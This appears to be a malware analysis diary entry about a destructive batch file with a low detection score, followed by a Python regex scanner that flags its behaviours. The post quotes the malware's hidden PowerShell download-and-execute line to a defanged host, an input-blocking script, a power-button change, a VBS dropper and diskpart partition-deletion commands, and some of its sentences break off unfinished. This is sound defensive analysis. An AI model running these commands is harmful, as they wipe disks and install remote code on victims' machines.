I found another script that performs malicious actions. It's a simple batch file (.bat) that is not obfuscated, but it has a very low VT score (1/53). The file hash is cc8ae359b629bc40ec6151ddffae21ec8cbfbcf7ca7bda9b3d9687ca05b1d584. The file is detected by only one antivirus engine, which triggered on the "shutdown.exe" located at the end of the script! Why does this script annoy people? Because it uses the
```
powershell -exec bypass -w h -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('hxxps://phoenixthrush[.]com/payloads/scripts/disabling_user_input/disable_user_input.ps1')|iex"
```
Here is the PowerShell code downloaded and executed:
```
# requires Administrator
$code = @'
[DllImport("user32.dll")]
public static extern bool BlockInput(bool fBlockIt);
'@
$userInput = Add-Type -MemberDefinition $code -Name Blocker -Namespace UserInput -PassThru
# block user input
$null = $userInput::BlockInput($true)
```
If you don't know what the purpose of the
Tip: most people don’t know but there is a way to “unlock” the computer: Just press Ctrl-Alt-Delete then select "Cancel".
The next one-liner reconfigures what the power button does:
```
powershell -exec bypass -w h -c "powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0"
```
powercfg.exe is a standard tool provided by Microsoft to query and modify power schemes.
Then, the script drops two scripts on the target:
```
set WshShell = wscript.createobject("WScript.shell")
WshShell.run """C:\Windows\Temp\x.bat"" ", 0, true
```
The file x.bat is a long script that destroys the victim's computer. Here are some pieces of code:
```
:: deleting some Windows partitions
echo Select Disk 0 >> y.txt
echo Select Partition 2 >> y.txt
echo Delete Partition Override >> y.txt
echo Select Partition 4 >> y.txt
echo Delete Partition Override >> y.txt
diskpart /s y.txt >nul
```
```
:: creating a message box
echo msgbox"stupid b*tch",0 , "get rekt, ur PC has been f*cked" >> y.vbs
```
That's the first time that I see a call to
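The low VT score comes from engines keying on a single binary name (shutdown.exe) rather than on the behaviours chained above. As an added example that is not part of this diary or of the malware, here is a small behaviour-based scanner that flags those primitives (hidden PowerShell with `-exec bypass`, download piped to `iex`, `pbuttonaction 0`, `Delete Partition Override`, `BlockInput`, `shutdown`) in script text. The two samples are constructed to mimic the quoted snippets; the URL is a placeholder.

```python
import re

# Constructed sample mimicking the batch primitives quoted in the diary.
# It is NOT the real x.bat; the URL is a placeholder.
SAMPLE_BAT = r'''@echo off
powershell -exec bypass -w h -c "(New-Object Net.WebClient).DownloadString('https://example.invalid/disable_user_input.ps1')|iex"
powershell -exec bypass -w h -c "powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0"
:: deleting some Windows partitions
echo Select Disk 0 >> y.txt
echo Delete Partition Override >> y.txt
diskpart /s y.txt >nul
echo msgbox"bye",0,"bye" >> y.vbs
shutdown /s /t 0
'''

# Constructed sample mimicking the downloaded PowerShell stage.
SAMPLE_PS1 = r'''$code = @'
[DllImport("user32.dll")]
public static extern bool BlockInput(bool fBlockIt);
'@
$null = $userInput::BlockInput($true)
'''

# (rule name, regex) pairs: each rule describes a behaviour, not one file name.
RULES = [
    ("hidden-bypass-powershell", re.compile(r"powershell\b.*-exec\w*\s+bypass\b.*-w\s+h\b", re.I)),
    ("download-to-iex", re.compile(r"(?:downloadstring|iwr|invoke-webrequest|net\.webclient).*\|\s*iex\b", re.I)),
    ("power-button-disabled", re.compile(r"powercfg\b.*\bpbuttonaction\s+0\b", re.I)),
    ("partition-deletion", re.compile(r"delete\s+partition\s+override|diskpart\s+/s\b", re.I)),
    ("user-input-blocked", re.compile(r"\bBlockInput\s*\(", re.I)),
    ("forced-shutdown", re.compile(r"^\s*shutdown(?:\.exe)?\b", re.I)),
]


def scan(text):
    """Return (rule_name, line_number) for every line matching a rule."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((name, lineno))
    return hits


def triggered_rules(text):
    """Set of distinct rule names that fired on the given script text."""
    return {name for name, _ in scan(text)}


if __name__ == "__main__":
    for label, sample in (("x.bat", SAMPLE_BAT), ("disable_user_input.ps1", SAMPLE_PS1)):
        for name, lineno in scan(sample):
            print(f"{label}:{lineno}: {name}")
```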
Xavier Mertens (@xme)
Jan 4th 2022